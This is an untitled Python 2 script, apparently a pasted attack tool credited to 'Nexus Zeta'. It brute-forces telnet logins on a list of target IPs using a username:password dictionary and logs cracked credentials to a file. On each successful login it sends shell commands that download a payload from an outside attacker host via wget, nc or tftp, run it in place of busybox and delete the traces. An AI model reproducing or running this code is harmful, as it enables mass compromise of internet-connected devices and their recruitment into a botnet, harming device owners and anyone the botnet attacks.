Untitled

#!/usr/bin/env python
from termcolor import colored
from Queue import *
from sys import stdout
import threading, sys, time, random, socket, re, os, logging
if len(sys.argv) < 5:
    print "Example: python %s targets.txt dictionary.txt <threads(1-100)> <ips per scan(100-1000)>" % (str(sys.argv[0]))
    print "Dictionary should be in user:pass format"
    sys.exit(1)
print "\x1b[1;32m***********************\x1b[1;35m"
print "\x1b[1;32m* Coded by Nexus Zeta *\x1b[1;35m"
print "\x1b[1;32m***********************\x1b[1;35m"
#ip=sys.argv[1]
filename=sys.argv[2]
threads = int(sys.argv[3])
h0h0 = int(sys.argv[4])
ips = open(sys.argv[1], "r").readlines()
queue = Queue()
qcount = 0

#cd /tmp || cd /var/run || cd /etc || cd /mnt || cd /root || cd /; rm -rf busybox dvrHelper; wget http://unicorn.d3dx9.ch/bins.sh -O dvrHelper ; cp /bin/busybox ./; busybox cat dvrHelper > busybox;./busybox ;rm -rf busybox dvrHelper
wget = "cd /tmp || cd /var/run || cd /etc || cd /mnt || cd /root || cd /; rm -rf busybox dvrHelper; wget http://unicorn.d3dx9.ch/bins.sh -O dvrHelper ; cp /bin/busybox ./; busybox cat dvrHelper > busybox;./busybox ;rm -rf busybox dvrHelper"
echo = "cd /var/; rm -rf busybox filename; rm -rf busybox armv4l.sh; echo -ne 'GET /armv4l.sh HTTP/1.0\r\nHost: 163.172.90.235\r\n\r\n' | nc 163.172.90.235 80 > armv4l.sh; chmod +x *; sed -i 1,9d armv4l.sh; cp /bin/busybox ./; busybox cat armv4l.sh > armv4l.sh; chmod +x armv4l.sh; ./armv4l.sh; rm -rf busybox armv4l.sh;"
tftp1 = "cd /tmp || cd /var/run || cd /etc || cd /mnt || cd /root || cd /; rm -rf busybox dvrHelper; tftp 163.172.90.235 -c get bins.sh; mv bins.sh dvrHelper ; cp /bin/busybox ./; busybox cat dvrHelper > busybox;./busybox ;rm -rf busybox dvrHelper"
tftp2 = "cd /tmp || cd /var/run || cd /etc || cd /mnt || cd /root || cd /; rm -rf busybox dvrHelper; tftp -r bins.sh -g 163.172.90.235; mv bins.sh dvrHelper ; cp /bin/busybox ./; busybox cat dvrHelper > busybox;./busybox ;rm -rf busybox dvrHelper"
#ftpget = "cd /var/; rm -rf armv4l; ftpget -v -u anonymous -p anonymous -P 21 163.172.90.235 armv4l armv4l; cp /bin/busybox ./; busybox cat armv4l > busybox; ./busybox; rm -rf busybox armv4l;"
#curl = "cd /var/; rm -rf armv4l; curl -O http://unicorn.d3dx9.ch/bin/armv4l; cp /bin/busybox ./; busybox cat armv4l > busybox; ./busybox; rm -rf busybox armv4l;"

for ip in ips:
    qcount += 1
    stdout.write("\r[%d] Added to queue" % qcount)
    stdout.flush()
    queue.put(ip)
print "\n"

def readUntil(tn, string, timeout=20):
    buf = ''
    start_time = time.time()
    while time.time() - start_time < timeout:
        buf += tn.recv(1024)
        time.sleep(0.01)
        if string in buf: return buf
    #raise Exception('TIMEOUT!')

def worker():
    try:
        while True:
            try:
                if queue.empty() == True:
                    sys.exit(1)
                iplist = []
                h0h0h0 = h0h0 + 1
                #print "\033[33mGathering IPs\033[37m"%(ip.rstrip("\n"))
                for x in xrange(h0h0h0):
                    ip = queue.get()
                    iplist.append(ip)
                    #print "\033[33mIP Address Obtained \033[32m%s\033[37m"%(ip.rstrip("\n"))
                    queue.task_done()
                time.sleep(1.5)
                for ip in iplist:
                    t = threading.Thread(target=ipthread, args=(ip.rstrip(),"null"))
                    t.start()
                    time.sleep(0.009)
                time.sleep(1)
                #print "\033[32mStarting Telnet Threads\033[37m"
            except:
                print "\033[31mWORKER ERROR\033[37m" #will fuk up if more threads/workers then ips in list
                pass
    except:
        pass


def attempt(IP,UserName,Password):
        try:
            ip=IP
            username=UserName
            password=Password
            tn = socket.socket()
            tn.settimeout(5)
            tn.connect((IP, 23))
        #except Exception:
            #print "[%s] Timeout"%(count)
        #try:
            time.sleep(0.01)
            hoho = ''
            hoho += readUntil(tn, ":")
            if "ogin" in hoho or "sername" in hoho:
                tn.send(UserName + "\n")
        except Exception:
            tn.close()
        try:
            hoho = ''
            hoho += readUntil(tn, ":")
            if "assword" in hoho:
                tn.send(Password + "\n")
                tn.send("wget\n")
                tn.send("tftp\n")
                tn.send("ifconfig\n")
                time.sleep(3)
        except Exception:
            tn.close()
        try:
            mp = ''
            mp += tn.recv(1024)
            if "#" in mp or "$" in mp or "@" in mp or ">" in mp:
            #if "addr" in mp or "Usage" in mp or "wget:" in mp or "tftp:" in mp or "ifconfig:" in mp or "$" in mp or "#" in mp:
                tn.send(wget + "\n")
                tn.send(echo + "\n")
                tn.send(tftp1 + "\n")
                tn.send(tftp2 + "\n")
                #tn.send(ftpget + "\n")
                #tn.send(curl + "\n")
                print '\x1b[1;32mFound \x1b[1;31m '+IP+':23 \x1b[1;35m'+UserName+':\x1b[1;36m'+Password+'\x1b[1;33m'
                f = open('session.txt', 'a')
                f.write("%s:23 %s:%s\n" % (IP, UserName, Password))
                f.close()
                time.sleep(15)
                tn.close()
        except Exception:
            tn.close()

def ipthread(ip,null):
    fd = open(filename, "r")
    for line in fd.readlines():
    username, password = line.strip().split(":")
    t = threading.Thread(target=attempt, args=(ip,username,password))
    t.start()
    time.sleep(0.3)
    fd.close()

for g in xrange(threads):
    t = threading.Thread(target=worker)
    t.setDaemon(True)
    t.start()
    time.sleep(0.001)

queue.join()
print "Finished!"